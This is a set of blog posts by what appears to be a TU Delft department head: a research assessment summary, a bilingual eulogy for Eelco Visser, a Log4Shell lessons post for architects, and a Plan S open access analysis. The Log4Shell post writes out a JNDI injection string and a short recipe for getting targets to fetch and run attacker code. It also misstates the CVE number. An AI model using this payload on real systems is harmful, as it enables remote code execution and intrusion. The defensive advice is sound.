TU Delft Computer Science Research Assessment 2015-2020

Last year, the TU Delft computer science research programs were evaluated, comprising a reflection on the preceding six years (2015-2020), and an outlook the next six years.

The assessment follows the Strategy Evaluation Protocol (SEP), used by all Dutch universities, which focuses on research quality, societal impact, and viability. The assessment is conducted by an international external committee. It is based on a self-assessment written by us, as well as a two-day site visit by the committee.

Arie van Deursen and Alan Hanjalic in the Computer Science building

At TU Delft, computer science is organized into two departments: Intelligent Systems, chaired by Alan Hanjalic and Software Technology, chaired by me.

In 2021, Alan and I together worked hard to compile our self-assessment report. It is based on extensive discussions with and contributions by many people, both inside and outside the two departments. It contains our thoughts on what we want computer science in Delft to achieve (our mission), what we did to achieve this (our strategy), an assessment of the success of our approach (our SWOT), and a plan of action for the next years ahead (our future strategy).

We proudly make the full self-assessment report available via this link — the only modification being that for reasons of privacy we omitted some of the appendices that could be traced back too easily to individual faculty members.

As part of the protocol, the committee’s findings, as well as the reaction of the executive board to these findings, have been made available as well, at the central TU Delft site. The committee is “positive about the very high and often excellent research quality, the high quality of the staff as well as the energy, drive and potential of the primarily junior research staff of both departments,” and “recognizes the relevance and societal impact of the researchcarried out the INSY and ST departments.”

We are grateful to the external committee, and in particular for the 17 recommendations that will help us further strengthen TU Delft computer science. We have integrated these recommendations in the action plan already laid out in our self-assessment, and look forward to work with everyone in our departments and our faculty to execute this action plan in the next few years.

Below, we provide the executive summary of our self-assessment, and we invite you to have a look at our full report.


Self-Assessment Summary

The phenomena of datafication and AI-zation reflect the increasing tendency to quantify everything through data and to automate the decision-making processes that are also largely based on data. Since these phenomena have entered all segments of our lives and since research in computer science (CS) is at the heart of the technological developments underlying these phenomena, CS as a research field has gained strategic importance. TU Delft Computer Science operates at the forefront of these developments with the aim to help society at large, by enabling it to maximally benefit from these phenomena, while protecting it from potential risks. To that end, inspired and driven by the TU Delft core values of Diversity, Inclusion, Respect, Engagement, Courage and Trust (DIRECT), our mission includes (1) conducting world class research in selected computer science core areas; (2) maximizing opportunities for societal impact of our research; (3) providing rigorous, research-inspired engineering education in computer science; and (4) contributing to an international academic culture that is open, diverse and inclusive, and that offers openly available knowledge.

We are organized in two departments, Intelligent Systems and Software Technology, consisting of 5 and 6 sections respectively. Sections are small-scale organizational units, typically headed by a full or associate professor and marking a particular CS disciplinary scope. While the departments are separate units, they work closely together in research and education, and collaborate for societal impact. The convergence between the departments in terms of alignment and joint pursuit of strategic and operational goals has even become so strong over recent years that we can speak of an increasingly recognizable CS entity in Delft organizing its research into five main themes transcending the departmental and section boundaries: (1) decision support; (2) data management and analytics; (3) software systems engineering; (4) networked and distributed systems; and (5) security and privacy. The themes offer critical mass in order to achieve substantial impact, and each theme involves many researchers with various CS backgrounds and expertise.

Award-winning research in these themes achieved during 2015-2020 include a novel cross-modal (e.g., combining text and images) retrieval method based on adverserial learning; genetic algorithms for the automatic reproduction of software crashes to facilitate automated debugging; and Trustchain, a permission-less tamper-proof data structure for storing transaction records of agents with applications in digital identity. International recognition of our expertise is reflected by numerous leadership roles, e.g., as general or program chairs in numerous flagship conferences, such as AAAI, EuroGraphics, ACM/IEEE ICSE, ACM OOPSLA, ACM RecSys and ACM Multimedia. In the same time period, several staff members also received the highest (inter)national recognition in their fields, such as IEEE Fellow, membership of the Young Academy of the Royal Dutch Academy of Sciences, or the Netherlands Prize for ICT Research. Our scientific reputation also brought us into the consortia of two prestigious NWO Gravitation Projects (“NWO Zwaartekracht“) of the Dutch Research Council, Hybrid Intelligence and BRAINSCAPES – the consortia that “belong to the world top in their field of research or have the potential to do so”

To maximize societal impact, we embrace eight key sectors: transport and logistics, energy, health and well-being, safety and security, finance, online education, creative industry, and smart cities. To enable and support us in making substantial interdisciplinary impact in these sectors, we have built up expertise, a network of collaborators and societal partners, and established the necessary organizational structures. Prominent examples of our impact in these sectors include the NGS sequencing analysis pipeline we designed and implemented as part of the NIPT test, which is used routinely by hospitals in several countries; Cytosplore, a software system for interactive visual single-cell profiling of the immune system; and SocialGlass, a tool suite for integration, enrichment, and sense-making of urban data. Our close ties with society are also reflected in our strategic collaborations with socio-economical partners, such as ING, DSM, Booking.com, Adyen, Ripple, Erasmus Medical Center and Leiden University Medical Center, leading amongst other things to strategic investments in the form of three large industry-funded labs (with ING, DSM and Booking.com) setup in the assessed time period for a duration of five years. Furthermore, we have invested extensive effort in public outreach, explaining and discussing science with a broad audience, and in particular in the context of complex societal debates in the domain of AI and blockchain. Finally, we play a leading role in regional, national and European initiatives, most notably in the Dutch AI Coalition (NLAIC).

In addition to scientific excellence and strong impact in the selected societal sectors, we are committed to (a) meeting the increasing societal need for highly skilled CS experts, (b) development of human capital in our organization, leading to a new generation of international academic leaders, and (c) advancing the organization and academic culture, with the key pillars of open science, diversity and inclusion.

Regarding (a), we embraced an over 100% increase of our student population, but also aim at securing the highest possible level of their knowledge, skills and academic forming despite scaling up. Therefore, we value a close connection between research and education, and let both MSc and BSc students participate actively in our research. We also formulated an ambitious strategy, the realization of which would enable us to manage this education scale-up efficiently and effectively, leaving sufficient room to our staff for further developing scientific excellence and deploying it for societal impact. Part of this strategy is the growth of our academic staff towards 100 FTE by 2024 to meet the stabilization of the student numbers (due to numerus fixus). Between 2015 and 2020, we already achieved a net growth from 54 to 72 faculty members (+33%), with more to come in the upcoming years.

Next to BSc and MSc students, we are committed to delivering highly skilled CS experts at the PhD level. The number of PhD students grew from 105 to 165 (+57%) in the assessed time period, reflecting our ability to successfully acquire research funding in the present landscape. For our PhD students, the Graduate School defines a framework in which they can develop their skills next to conducting their thesis research. We strive towards completion of PhD theses within four years and organize our supervision, official moments of assessment, requirements on the volume and quality of the conducted research, as well as evidence of scientific impact through publications, accordingly.

Regarding (b), development of human capital: as computer science expertise is in high demand across the globe, finding strong new people as well as retaining our current staff proved highly challenging, especially given the high teaching load due to our record student intake. Therefore, acquiring, developing and retaining academic talent has been one of our most important goals. Dedicated actions, such as devising of a Development Track Plan, serve to empower each staff member to provide contribution to the organization in his/her own way, based on individual interests, talents and ambitions, and in view of our joint ambition as organization.

In view of (c), our organization, we embrace open science, with a substantial percentage (80% in 2020) of our articles available as open access, and by making numerous software tools and data sets openly available. We are a highly international organization with employees and students from all over the world. We strive to be an inclusive organization, where staff and students feel at home and valued, regardless of their background, age, gender, sexual orientation or functional disability. In terms of female faculty, we realized a net growth from 11 to 14 faculty members. As the number of men employed also increased, the percentage of female faculty stayed stable at around 20%. We consider this too low. We are committed to addressing this, for which we will take a long-term approach with, amongst other means, dedicated budget reserved for continued openings for female faculty in the upcoming years.

We are proud of our scientific successes and societal impact in the core computer science disciplines as well as in interdisciplinary research in our target societal sectors. This is especially so as those were achieved in a period that was transformational for TU Delft Computer Science, characterized by substantial growth and development across our organization and activities. We anticipate an even stronger societal demand for our research and expertise in the future. We will therefore continue to initiate, participate and take on a key role in effective and interdisciplinary partnerships at the university (TU Delft AI), regional (LDE), national (ICAI, IPN), and European (ELLIS, CLAIRE) levels. Furthermore, we will continue the growth path for our staff, in order to build up capacity enabling us to further develop our scientific excellence and offer our strongly increased student population the world-class research-intensive education they deserve. To achieve this, we center the next steps in our ongoing transformation around people, organization, and profiling and identify seven key actions for the upcoming years that aim at (1) improving our attractiveness as an employer; (2) improving diversity and inclusion; (3) improving the execution of the PhD program; (4) expanding our staff capacity; (5) aligning our office space with the optimal way of working; (6) articulating the scientific profile; and (7) boosting our scientific and societal impact.

Eelco Visser (1966-2022)

Text of the eulogy for Eelco Visser (12 October 1966 – 5 April 2022) at his farewell ceremony held in Leusden, April 2022. Original text in Dutch.

December 2017

I stand in front of you, in total disbelief, as head of the department for which Eelco Visser has worked the last 15 years.

I would like to offer you my perspective on Eelco’s significance, as a scientist, as a teacher, and as a person.

Eelco and I got to know each other in 1992, thirty years ago.

At the time, I was halfway my PhD in Amsterdam, working in the group of Paul Klint. Eelco was studying in Amsterdam, following Paul’s courses. These were so inspiring to Eelco that he decided to join Paul’s group, first to write his master’s thesis, and then to work on his PhD.

It didn’t take long before Eelco and I had a connection. We had extensive discussions about research. The details don’t matter, and they didn’t really lead to concrete results. But thirty years later I still remember the substantive drive, the deep desire to profoundly understand a problem, the feeling to work on something very important, and, of course, Eelco’s tenacity.

Eelco has been able to maintain that same drive for thirty years. Just like he knew how to inspire me, year after year he has inspired his students and his (international) peers — always driven by content, always persistent.

This contributed to Eelco’s research being of the highest international level. Let me illustrate this through an award he received in 2020, a so-called Most Influential Paper award. This is an award you get ten years after publication, after it has been established that your paper actually had made the biggest impact.

Eelco received this award for his article from 2010 on Spoofax, written with (then) PhD student Lennart Kats. Eelco was very proud of this award, and rightly so. In fact, he was so proud that he wrote a (long) blog post about it, entitled “A short history of the Spoofax language workbench.”

This “short history” starts in 1993 with Eelco’s PhD research in Amsterdam. Next, Eelco explains his journey, from Portland as a postdoc, via Utrecht as assistant professor, to Delft as associate and full professor. Each of these stops provides building blocks for the award-winning paper from 2010. And then, Eelco’s “short history” continues: He describes what his group in those ten years after the paper’s publication has done, and what good things he still has in store for the time to come.

To me, this “short history” is signature Eelco:

  • Visionary, working year after year on building blocks that all belong together
  • System-driven, with working software that he preferably contributes to himself
  • In a team, together with his PhD students, postdocs, engineers, students, and numerous international co-workers.

This short history also serves to illustrate the international side of Eelco’s work. He was very active, and loved, within international organizations like IFIP and ACM SIGPLAN. He succeeded in bringing the flagship SPLASH conference to Europe for the first time.

And, naturally, Eelco had a vision on how to improve things: All those conferences putting effort in ad hoc web sites: There had to be a better way. And so, in line with his systems philosophy, he designed the CONF system that has been up and running for ten years now. And he managed to convince hundreds of conferences to use his system, for a fee.

Likewise, Eelco had a vision on education, and he knew how to realize it. In his opinion, programming education just had to be better. Thus, he designed a system, WebLab, which has also been in operation for almost 10 years now. And here too he managed to convince countless teachers to use his system.

In addition, Eelco had a well-thought-out opinion about the courses that belong in a computer science program. So when we needed to revise our curriculum, Eelco was the perfect candidate to chair the associated committee. Eelco did this graciously, in a calm and persistent manner, reasoning from educational principles to settle disputes. The result is rock solid.

Eelco’s education is well characterized by Willem-Paul Brinkman in the online Farewell Community: Without maybe realizing it, many generations of Delft students will benefit from his teaching innovations.

Eelco was proud of his Programming Languages Group. He built it up from scratch into an international top group. He took good care of his people, fighting for the best equipment and offices. As a member of the departmental management team, he fought for computer science in full, at faculty and university level. Nationally he was active in, for example, the Dutch National Association for Software Engineering VERSEN.

And how was Eelco able to realize all this? What was his secret?

Perhaps Eelco actually liked (a little) resistance. He was not afraid to disagree: after all, he had thought deeply about his opinion. And he was fine with being challenged: it was a sign that he was well on his way to breaking the status quo.

Maybe not everyone always found this easy. But Eelco was also very friendly, and certainly willing to change his mind.

And, Eelco was also patient: Big changes take time. If he saw that he had insufficient supporters, he could wait. Or, under the radar, start small in order to set his own plans in motion.

How much we will miss Eelco in Delft! The visionary, the obstinate, the focus on the content, the love for computer science, the tenacity, and the attention for students and colleagues: exactly what we need so much in Delft.

Let me conclude with a few words related to Corona and the lock down. The past few years, Eelco and I were in touch weekly, mostly within the departmental management team, but also often one-on-one. All online, from home. We discussed departmental matters, small and large, as well as the impact of Corona. On one thing we agreed: Being at home more, seeing more of your children, doing more with the family: we both experienced this as a gift.

Due to the lock down, I don’t know when it was that I saw Eelco last in person. I think it was on October 14, at the PhD defense of Arjen Rouvoet. This was a beautiful day, and this is how I like to remember Eelco: Science at the highest level, international peers in substantive debate, a cum laude PhD defense, and Eelco happy, radiant in the midst of his PL group.

Dear family, friends, colleagues, everyone: We will miss Eelco very much. Each of us has his or her own, wonderful memories of Eelco. Today is a day to hold on to that, and to share those memories with each other.

I wish you all, and especially the family, all the best.

Eelco Visser (1966-2022)

Toespraak gehouden tijdens de uitvaartplechtigheid van Eelco Visser (12 oktober 1966 – 5 april 2022) op 12 april 2022 in Leusden. English translation available.

December 2017

Ik sta hier, in totale verbijstering, als hoofd van de afdeling waar Eelco Visser de afgelopen 15 jaar gewerkt heeft.

Ik wil U graag iets vertellen over de betekenis van Eelco, als wetenschapper, als docent, en als mens.

Eelco en ik leerden elkaar kennen in 1992, dertig jaar geleden.

Ik was toen halverwege mijn promotie in Amsterdam, en werkte in de groep van Paul Klint. Eelco studeerde toen in Amsterdam, en volgde colleges bij Paul. Die inspireerden hem zo dat hij zich aansloot bij Pauls groep om daar eerst af te studeren en later te promoveren.

Eelco en ik hadden al snel een klik. We hadden uitgebreide discussies over onderzoek. De details doen er niet toe, en tot een echt resultaat hebben ze niet geleid. Maar dertig jaar later herinner ik me nog steeds de inhoudelijke drive, de wens om een probleem écht te snappen, het gevoel samen met iets héél belangrijks bezig te zijn, en natuurlijk Eelco’s vasthoudendheid.

Diezelfde drive heeft Eelco dertig jaar vast weten te houden. Zoals hij mij wist te inspireren, heeft hij jaar in jaar uit zijn studenten, zijn promovendi, en zijn internationale collega’s aan zich weten te binden — altijd vanuit de inhoud, en altijd vasthoudend.

Mede hierdoor was Eelco’s onderzoek van het hoogste internationale niveau. Laat ik dit illustreren aan de hand van een prijs die hij in 2020 ontving: een zogenaamde “Most Influential Paper” Award. Zo’n prijs krijg je pas als je artikel 10 jaar na publicatie de meeste invloed gehad bleek te hebben.

Eelco kreeg die voor zijn artikel uit 2010 over Spoofax, met promovendus Lennart Kats. Eelco was hier, terecht, heel trots op. Zó trots, dat hij er een (lange) blog post over heeft geschreven, getiteld Een korte geschiedenis van de Spoofax taalwerkbank.

Deze “korte geschiedenis” begint in 1993 bij Eelco’s promotieonderzoek in Amsterdam. Vervolgens legt Eelco zijn reis uit, van Portland als postdoc, via Utrecht als universitair docent, naar Delft als hoofddocent en hoogleraar. Elk van deze tussenstops levert bouwstenen op voor het winnende paper uit 2010. En vervolgens gaat Eelco’s “korte geschiedenis” door: Hij beschrijft wat zijn groep in die tien jaar na het paper heeft gedaan, en wat voor moois hij nog in petto heeft voor de tijd die komen gaat.

Wat mij betreft is deze “korte geschiedenis” Eelco ten voeten uit:

  • visionair, jaar in jaar uit werkend aan bouwstenen die allemaal bij elkaar horen
  • systeem-gedreven, met werkende software systemen waar hij het liefst zelf aan meeprogrammeert
  • in team verband, samen met zijn promovendi, postdocs, engineers, studenten, en talloze internationale collega’s.

Deze korte geschiedenis laat ook iets zien over de internationale dimensie van Eelco’s werk. Hij was zeer actief, en geliefd, binnen internationale organisaties zoals IFIP en ACM SIGPLAN. Het lukte hem om het top-congres SPLASH voor het eerst naar Europa te halen.

En natuurlijk had Eelco een visie hoe het beter kon: Al die congressen die hun web site in elkaar liepen te knutselen: dat moest efficiënter kunnen. En dus, in lijn met zijn systeem-filosofie, ontwierp hij het CONF systeem dat nu al tien jaar in de lucht is. En wist hij honderden congressen te overtuigen zijn systeem, tegen betaling, te gebruiken.

Ook op het gebied van onderwijs had Eelco een visie, en wist hij die te realiseren. Programmeeronderwijs moest beter, vond hij, en dus ontwierp hij een systeem, WebLab, dat nu ook al bijna 10 jaar in de lucht is. En ook hier wist hij talloze docenten te overtuigen zijn systeem te gebruiken.

Daarnaast had Eelco een goed doordachte mening over welke vakken in een opleiding informatica thuis horen. Toen wij ons curriculum moesten herzien, was Eelco de perfecte kandidaat om de bijbehorende commissie voor te zitten. Eelco deed dit met verve, rustig en vasthoudend, redenerend vanuit onderwijskundige principes om geschillen te beslechten. Het resultaat staat als een huis.

Voor Eelco’s onderwijs geldt wat Willem-Paul Brinkman in het online condoleance register schreef: “Zonder het misschien te beseffen, zullen vele generaties Delftse studenten profiteren van zijn onderwijsinnovaties.”

Eelco was trots op zijn “Programming Languages Group“. Hij heeft die uit het niets opgebouwd tot een internationale topgroep. Hij zorgde goed voor zijn mensen, en streed voor de beste apparatuur en werkplekken. Als lid van het management team van de afdeling, zette hij zich in voor informatica in de volle breedte, op facultair en universitair niveau. Ook landelijk was hij actief, onder meer in de Nederlandse Vereniging voor Software Engineering VERSEN.

En hoe kreeg Eelco dit allemaal voor elkaar? Wat was zijn geheim?

Misschien vond Eelco (een beetje) weerstand eigenlijk wel leuk. Hij was niet bang tegengas te geven: hij had tenslotte goed nagedacht over zijn mening. En hij vond het prima tegenstand te krijgen: dat was een teken dat hij goed op weg was de status quo te doorbreken.

Misschien vond niet iedereen dit altijd even makkelijk. Maar Eelco was ook heel vriendelijk, en zeker bereid van mening te veranderen.

En, Eelco was ook geduldig: Grootse veranderingen kosten tijd. Als hij zag dat hij onvoldoende medestanders had kon hij wachten. Of, onder de radar, alvast klein beginnen om zijn eigen plannen toch in gang te zetten.

Wat zullen we Eelco missen in Delft. Het visionaire, het dwarse, de focus op de inhoud, de liefde voor het vak, de vasthoudendheid, en de aandacht voor student en collega: juist dat hebben we nodig in Delft.

Ik wil afsluiten met een paar woorden naar aanleiding van Corona en de lockdown. De afgelopen twee jaar hadden Eelco en ik wekelijks contact, vooral binnen het management team van de afdeling, maar ook vaak 1-op-1, allemaal online, vanuit huis. We bespraken het reilen en zeilen van de afdeling, en de impact van Corona. Over één ding waren we het eens: Meer thuis zijn, meer zien van je kinderen, meer doen met het gezin: dit hebben we allebei als een geschenk ervaren.

Door de lockdown weet ik niet wanneer ik Eelco voor het laatst echt gezien heb. Ik denk dat het 14 oktober was, bij de promotie van Arjen Rouvoet. Dat was een mooie dag, en zo herinner ik me Eelco graag: Wetenschap van het hoogste niveau, internationale collega’s in inhoudelijk debat, een cum laude promotie, en Eelco gelukkig, stralend temidden van zijn PL groep.

Lieve familie, vrienden, collega’s, allemaal: We zullen Eelco zéér missen. Iedereen van ons heeft zijn of haar eigen, prachtige herinneringen aan Eelco. Vandaag is een dag om daaraan vast te houden, en om die herinneringen met elkaar te delen.

Ik wens u allen, en in het bijzonder de familie, alle sterkte toe.

Log4Shell: Lessons Learned for Software Architects

This week, the log4shell vulnerability in the Apache log4j library was discovered (CVE-2021-4428). Exploiting this vulnerability is extremely simple, and log4j is used in many, many software systems that are critical to society — a lethal combination. What are the key lessons you as a software architects can draw from this?

The vulnerability

In versions 2.0-2.14.1, the log4j library would take special action when logging messages containing "${jndi:ldap://LDAP-SERVER/a}": it would lookup a Java class on the LDAP server mentioned, and execute that class.

This should of course never have been a feature, as it is almost the definition of a remote code execution vulnerability. Consequently, the steps to exploit a target system are alarmingly simple:

  1. Create a nasty class that you would like to execute on your target;
  2. Set up your own LDAP server somewhere that can serve your nasty class;
  3. "Attack" your target by feeding it strings of the form "${jndi:ldap://LDAP-SERVER/a}" where ever possible — in web forms, search forms, HTTP requests, etc. If you’re lucky, some of this user input is logged, and just like that your nasty class gets executed.

Interestingly, this recipe can also be used to make a running instance of a system immune to such attacks, in an approach dubbed logout4shell: If your nasty class actually wants to be friendly, it can programmatically disable remote JNDI execution, thus safeguarding the system to any new attacks (until the system is re-started).

The source code for logout4shell is available on GitHub: it also serves as an illustration of how extremely simple any attack will be.

Under attack

As long as your system is vulnerable, you should assume you or your customers are under attack:

  1. Depending on the type of information stored or services provided, (foreign) nation states may use the opportunity to collect as much (confidential) information as possible, or infect the system so that it can be accessed later;
  2. Ransomware "entrepreneurs" are delighted by the log4shell opportunity. No doubt their investments in an infrastructure to scan systems for this vulnerability and ensure future access to these systems will pay off.
  3. Insiders, intrigued by the simplicity of the exploit, may be tempted to explore systems beyond their access levels.

All this calls for a system setup according to the highest security standards: deployments that are isolated as much as possible, access logs, and the ability to detect unwarranted changes (infections) to deployed systems.

Applying the Fix

Naturally, the new release of log4j, version 2.15, contains a fix. Thus, the direct solution for affected systems is to simply upgrade the log4j dependency to 2.15, and re-deploy the safe system as soon as possible.

This may be more involved in some cases, due to backward incompatibilities that may have been introduced. For example, in version 2.13 support for Java 7 was stopped. So if you’re still on Java 7, just upgrading log4j is not as simple (and you may have other security problems than just log4shell). If you’re still stuck with log4j 1.x (end-of-life since 2015), then log4shell isn’t a problem, but you have other security problems instead.

Furthermore, log4j is widely used in other libraries you may depend on, such as Apache Flink, Apache SOLR, neo4j, Elastic Search, or Apache Struts: See the list of over 150 affected systems. Upgrading such systems may be more involved, for example if you’re a few versions behind or if you’re stuck with Java 7. Earlier, I described how upgrading a system using Struts, Srping, and Hibernate took over two weeks of work.

All this serves as a reminder of the importance of dependency hygiene: the need to ensure dependencies are at their latest versions at all times. Upgrading versions can be painful in case of backward incompatibilities. This pain should be swallowed as early as possible, and not postponed until the moment an urgent security upgrade is needed.

Deploying the Fix

Deploying the fix yourself should be simple, and with an adequate continuous deployment infrastructure a simple push of a button or reaction to a commit.

If your customers need to install an upgraded version of your system themselves, things may be harder. Here investements in a smooth update process pay off, as well a disciplined versioning approach that encourages customers to update their system regularly, without as little incompatibility roadblocks as possible.

If your system is a library, you’re probably using semantic versioning. Ideally, the upgrade’s only change is the upgrade of log4j, meaning your release can simply increment the patch version identifier. If necessary, you can consider backporting the patch to earlier major releases.

Your Open Source Stack

As illustrated by log4shell, most modern software stacks critically depend on open source libraries. If you benefit from open source, it imperative that you donate back. This can be in kind, by freeing your own developers to contribute to open source. A simpler approach may be to donate money, for example to the Apache Software Foundation. This can also buy you influence, to make sure the open source libraries develop the features you want, or conduct the security audits that you hope for.

The Role of the Architect

As a software architect your key role is not to react to an event like log4shell. Instead, it is to design a system that minimizes the likelihood and impact such an event would have on confidentiality, integrity and availability of that system.

This requires investments in:

  • Maintainability: Enforcing dependency hygiene, keeping dependencies current at all times, to minimize mean time to repair and maximize availability
  • Deployment security: Isolating components where possible and logging access, to safeguard confidentiality and integrity;
  • Upgradability: Ensure that those who have installed your system or who use your library can seamlessly upgrade to (security) patches;
  • The open source eco-system: sponsoring the development of open source components you depend on, and contributing to their security practices.

To make this happen, you must guide the work of multiple people, including developers, customer care, operations engineers, and the security officer, and secure sufficient resources (including time and money) for them. Most importantly, this requires that as an architect you must be an effective communicator at multiple levels, from developer to CEO, from engine room to penthouse.

Europe’s Open Access “Plan S” and Paper Publishing in Software Engineering Research

A year ago, more than a dozen influential research funders in Europe launched Plan S. This plan poses, from 2021 onwards, strict requirements on open access publishing of any research funded through the Plan S coalition. To understand what this means for my field of research, software engineering, I did some data collection. My data suggests that 14% (one out of seven) of the published papers are affected, meaning that conferences may lose 14% of their papers, unless publishers take action.

Plan S in a Nutshell

Plan S is an initiative launched by:

  • The European Union, which runs the Horizon Europe program of €100 billion (over 113 billion US dollars). It is the successor to H2020, and includes funding for the prestigious personal grants of the European Research Council (ERC).
  • Twelve national research funding organizations, from various European countries, such as The Netherlands (where I live), the United Kingdom, and Austria.

The aim of these Plan S “funders” (collectively called “Coalition S”), is that

With effect from 2021, all scholarly publications on the results from research funded by public or private grants provided by national, regional and international research councils and funding bodies, must be published in Open Access Journals, on Open Access Platforms, or made immediately available through Open Access Repositories without embargo.

The coalition has taken an axiomatic approach to expressing its plans, starting with 10 principles, followed by a Guidance to the Implementation. The results is a somewhat hard to understand document, in which there are multiple ways to become Plan S compliant.

In all forms of Plan S compliance the Creative Commons license plays a key role. As Plan S (under the header Rights and Licensing) puts it:

The public must be granted a worldwide, royalty-free, non-exclusive, irrevocable license to share (i.e., copy and redistribute the material in any medium or format) and adapt (i.e., remix, transform, and build upon the material) the article for any purpose, including commercial, provided proper attribution is given to the author.

This, thus, corresponds to the Creative Commons Attribution license, also known as CC BY. Note that this is a very generous license, essentially allowing anyone to do anything with the paper. Traditionally, publishers do not like this, as they wish to keep exclusive control over who distributes the paper.

Strictly speaking, Plan S does not require CC BY per se, but authors need to ask permission for any other license. For the CC BY-SA “Share-Alike” variant of the license permission will be granted automatically, but for CC BY-ND “No Derivatives” permission needs to be asked. Coalition S explicitly indicates that CC BY-NC “Non-Commercial” is not allowed:

We will not accept a Non-Commercial restriction on the re-use of research results.

Given this CC BY starting point, Plan S distinguishes three routes to compliance:

  1. Open access venues: The conference or journal is gold open access, meaning all papers in it are freely available. This is “the ideal” case, from Plan S perspective, and compliant. Open access fees (“Article Processing Charges”) are common in this route, and will be refunded by Coalition S.
  2. Subscription-based venues: These by themselves are non-compliant, but can be made compliant if the author immediately (no embargo) deposits the Author’s Accepted Manuscript (AAM) in a compliant repository with a CC BY license. This license is a complicating factor, since many publishers pose restrictions on redistribution of self-archived papers (they are self-archived, and no one else can do this — which is at odds with the sharing principle of CC BY). If such restrictions exist, a way out can exist if the venue permits hybrid open access, in which authors can pay an extra fee to make their own article open access available with a CC BY license. This model is offered by many publishers, but not by all. Note, however, that in Plan S, while this route is “compliant”, Plan S does not refund the APC fees.
  3. Subscrition venues in transition: If the conference or journal is not open access yet, but in transition towards a full open access model by 2024, the publisher and Plan S can agree on “transformative arrangements”. In this case the paper will be compliant, and if there are fees involved they will (likely) be covered.

The 10 principles also address other issues relevant to open access: it requires that “the structure of fees must be transparent” (principle 05, suggesting that some of the current article processing charges are unexplainably high), and warns that the funders will monitor compliance and sanction non-compliant beneficiaries/grantees (principle 09, a direct threat to me).

Plan S should start in 2021, although publishers can earn some extra time by participating in the above-mentioned “transformative arrangements”.

Plan S Compliance in Software Engineering Research

To understand whether Plan S compliant publishing in my area of research, software engineering, is possible at the moment, I looked at the top 20 venues in the area of Software Systems, according to Google Metrics.

In these top 20 venues, just three are gold open access: POPL and OOPSLA, both published by ACM SIGPLAN, and ETAPS TACAS, published by Springer. It is in these venues that authors funded through Coalition S, can safely publish, following the gold open access route to compliance. Their open access fees will be covered by the Coalition S funders.

The remaining 17 are closed access subscription venues, published by ACM, IEEE, Elsevier and Springer. Authors who wish to publish there, and who need to be compliant with Plan S, would then have to resort to the self-archiving route.

Since the self-archiving constraints of these four publishers do not permit the use of CC BY without a fee, the hybrid route applies, in which (1) authors pay a fee; (2) the publisher distributes with CC BY; and (3) the author shares on a Plan S compliant repository. Note that this route is compliant, but that the fee is not refunded by Coalition S.

This self-archiving route works for IEEE journals, but not for IEEE conferences. This is because for IEEE conferences presently authors do not have the option to pay a fee to publish just their own paper open access (unlike ACM). As stated by IEEE in their FAQ on the “IEEE Policy Regarding Authors Rights to Post Accepted Versions of Their Articles”:

Currently IEEE does not have an Open Access program for conference articles.

In other words: Conferences published by IEEE are not Plan S compliant, not even with the green open access route (as IEEE does not permit CC BY).

Of the 20 venues, IEEE is the sole publisher of two conferences (ICSME and SANER), one magazine (IEEE Software), and the co-publisher of another three (ICSE, SANER, MSR) which are published alternatingly by IEEE or ACM.

In summary, of the 20 top venues:

  • Three are compliant through gold open access.
  • Eleven are compliant through a fee-based hybrid model with CC BY.
  • Three are half of the time compliant through a fee-based hybrid model with CC BY, the other half non-compliant.
  • Three can presently not be made compliant.

Note that other fields may fare better: top conferences in security (Usenix), AI (AAAI, NIPS), or OOPSLA/POPL/ICFP sponsored by SIGPLAN are all full gold open access. This, however, seems the exception rather than the rule.

Plan S Rationale

With Plan S requiring many publishers to change their policies, one may wonder what the rationale behind this plan is. The way I see it, the key reason for the European funders to propose this plan is leverage, in the following ways:

  • The European Union as a whole will benefit more from their €100 billion investment, if any (European) citizen can freely access the resulting knowledge;
  • Research is never conducted in isolation. Progress in research is not just visible in papers directly funded through a project, but also in subsequent papers building on top of those results (refuting, strengthening, criticizing, or expanding them). The more venues are open access, the higher the chance that these follow up results are also published as open access.
  • The universities in the European Union together will benefit financially if the publishing market shifts towards open access: The current profit margins of up to 40% of publishing giants like Elsevier are a waste of tax payer money that instead should be directly invested in research and education, the exact same causes that the EU and its Horizon Europe program seeks to advance as well. Pumping €100 billion into a system that wastes money at scale is ineffective.

Furthermore, note that this coalition works in all areas of research, including climate change, health care, and artificial intelligence. From the European perspective, the world needs informed societal debate about these topics. To that end, the EU is committed to maximizing the free availability of any research it is funding.

Last but not least, Coalition S is working hard to expand the list of funders, talking to both China and India, for example. Also, Jordania and Zambia have already joined, as well as the Bill and Melinda Gates Foundation (though their presence in computer science research is limited, compared to, e.g., China).

Impact on Software Engineering Conferences

With software engineering venues so clearly affected by Plan S, the next question is how many papers will be affected. Thus, I decided to collect some data, to measure the impact of Plan S in my field.

Since conferences (with full length rigorously reviewed papers) are dominant in software engineering, I focused on these. I picked two editions of ICSE and ESEC/FSE (for which I am a member of the steering committee) and for the smaller and more specialized ISSTA conference (which I happened to attend this summer).

For each published paper, I manually checked the acknowledgments to see whether the authors were beneficiaries from any of the Plan S funders. I did this for the main (technical research) track papers only, and not for, e.g., demonstration sub-tracks.

The results (also available as spreadsheet) are as follows:

Table with data per conference

A few results stand out:

  1. Overall, 14% (1 in 7) of the papers currently receive grants from Coalition S.
  2. The two big conferences, ICSE (over 1000 participants) and ESEC/FSE (over 300 participants), exhibit an impact on around 11-12% of the papers.
  3. For the smaller ISSTA conference, more than 25% of the papers are (co-)funded through Coalition S. This number reflects the composition of the community, and the impact is enlarged by the small total number of papers. Should the affected researchers decide not to submit to ISSTA anymore, this may constitute an existential threat to the conference.
  4. The EU is by far the biggest funder, with researchers and industry from many countries benefiting from participation in large EU projects. Furthermore, the EU ERC (Advanced) Grants are extremely prestigious (€2.5 million) and have been won by leaders in the software engineering field such as (in the collected data) Carlo Ghezzi, Mark Harman, Bashar Nuseibeh, and Andreas Zeller.
  5. The UK is the second biggest funder, mostly through its EPSRC program. This is the UK’s national program, unrelated to the European Union. Thus, EPSRC’s participation in Coalition S will not be affected by Brexit (apart from increased financial pressure on ESPRC’s overall budget as the UK’s economy is shrinking).
  6. While a small country with limited funds, Luxembourg is very active in the area of software engineering, causing high impact for, e.g., the ISSTA conference.

The 14% I found is substantially higher than the estimate of 6% impact found by Clarivate Analytics (cited by the ACM), and the 5% found by the ACM itself. If anything, this factor 3 or even factor 5 with ISSTA difference calls for a detailed assessment for each venue affected.

My data is based on what I saw in the acknowledgments: In reality it is likely that more papers are affected. You can check your own papers in my on line spreadsheet — corrections are welcome.

